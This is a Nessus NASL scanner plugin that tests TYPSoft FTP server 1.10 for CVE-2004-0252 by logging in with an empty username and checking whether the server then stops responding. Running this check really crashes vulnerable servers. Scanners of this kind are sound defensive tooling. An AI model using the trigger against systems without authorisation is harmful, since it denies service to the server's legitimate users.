#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
#
# Ref: "intuit bug_hunter" <intuit@linuxmail.org>
#
# This script is released under the GNU GPLv2

if(description)
{
 script_id(14707);
 script_cve_id("CVE-2004-0252");
 script_bugtraq_id(9573);
 script_version("$Revision: 1.11 $");
 name["english"] = "TYPSoft empty username DoS";

 script_name(english:name["english"]);
 desc["english"] = "
Synopsis :

It is possible to crash the remote FTP server. 

Description :

The remote host seems to be running TYPSoft FTP server, version 1.10. 

This version is prone to a remote denial of service flaw.  By sending
an empty login username, an attacker can cause the ftp server to
crash, denying service to legitimate users. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2004-02/0115.html

Solution : 

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 5.0 
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";

 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for TYPSoft FTP server empty username DoS ";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2004 David Maciejak");
 family["english"] = "FTP";
 script_family(english:family["english"]);
 script_dependencie("find_service_3digits.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here
#

include("ftp_func.inc");

login = "";
pass  = get_kb_item("ftp/password");
port = get_kb_item("Services/ftp");

if(!port)port = 21;
if (! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if ( ! soc ) exit(0);
if(ftp_authenticate(socket:soc, user:login, pass:pass))
 {
 	sleep(1);
 	#ftp_close(socket: soc);
	soc2 = open_sock_tcp(port);
	if ( ! soc2 || ! recv_line(socket:soc2, length:4096)) security_warning(port);
	else close(soc2);
	close(soc);
 }
